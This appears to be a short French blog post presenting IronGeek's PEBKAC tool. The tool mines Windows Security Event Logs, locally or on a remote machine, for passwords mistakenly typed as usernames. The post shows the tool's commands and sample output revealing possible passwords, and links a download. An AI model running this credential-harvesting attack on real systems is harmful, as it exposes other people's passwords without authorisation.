Voici une tres bonne idée de IronGeek ,qui est de chercher des mot de passe de session dans les log de sécurité !
Un tool a été créer pour plus de facilité, il recherche une mauvaise authentification pour ensuite la comparer a l'identifiant de la suivant avec qui s'est déroulé avec sucé.
Bien sur cette methode n'est pas a 100% fiable.
Attaque local
C:\>pebkac.exe
Irongeek's PEBKAC Attack on the Windows Security Event Log ver .1
Successful Login (18): Adrian
Possible Password (2): ir0n g33k
Successful Login (871): Adrian
Possible Password (869): network logon password
Attaque a distance
C:\>pebkac.exe \\cthulhu
Irongeek's PEBKAC Attack on the Windows Security Event Log ver .1
Working on \\cthulhu...
Successful Login (868): Admin
Possible Password (864): god
Successful Login (871): Adrian
Possible Password (869): network logon password
Download PEBKAC
Aucun commentaire:
Enregistrer un commentaire